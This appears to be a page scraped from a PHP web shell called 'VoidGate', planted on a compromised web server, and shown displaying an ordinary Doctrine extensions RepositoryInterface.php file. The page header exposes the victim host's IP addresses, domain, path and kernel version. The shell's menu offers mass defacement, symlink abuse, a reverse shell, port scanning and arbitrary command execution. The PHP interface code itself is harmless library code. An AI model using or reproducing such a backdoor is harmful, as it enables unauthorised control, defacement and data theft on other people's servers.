ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
gedmo
/
doctrine-extensions
/
src
/
Tree
/
Viewing: RepositoryInterface.php
<?php /* * This file is part of the Doctrine Behavioral Extensions package. * (c) Gediminas Morkevicius <gediminas.morkevicius@gmail.com> http://www.gediminasm.org * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Gedmo\Tree; use Gedmo\Exception\InvalidArgumentException; /** * This interface ensures a consistent API between repositories for the ORM and the ODM. * * @author Gustavo Falco <comfortablynumb84@gmail.com> * @author Gediminas Morkevicius <gediminas.morkevicius@gmail.com> */ interface RepositoryInterface extends RepositoryUtilsInterface { /** * Get all root nodes. * * @param string $sortByField * @param string $direction * * @return array */ public function getRootNodes($sortByField = null, $direction = 'asc'); /** * Returns an array of nodes optimized for building a tree. * * @param object $node Root node * @param bool $direct Flag indicating whether only direct children should be retrieved * @param array $options Options, see {@see RepositoryUtilsInterface::buildTree()} for supported keys * @param bool $includeNode Flag indicating whether the given node should be included in the results * * @return array */ public function getNodesHierarchy($node = null, $direct = false, array $options = [], $includeNode = false); /** * Get the list of children for the given node. * * @param object|null $node If null, all tree nodes will be taken * @param bool $direct True to take only direct children * @param string|string[]|null $sortByField Field name or array of fields names to sort by * @param string|string[] $direction Sort order ('ASC'|'DESC'). If $sortByField is an array, this may also be an array with matching number of elements * @param bool $includeNode Include the root node in results? * * @return array|null List of children or null on failure */ public function getChildren($node = null, $direct = false, $sortByField = null, $direction = 'ASC', $includeNode = false); /** * Counts the children of the given node * * @param object|null $node The object to count children for; if null, all nodes will be counted * @param bool $direct Flag indicating whether only direct children should be counted * * @return int * * @throws InvalidArgumentException if the input is invalid */ public function childCount($node = null, $direct = false); }
Coded With 💗 by
0x6ick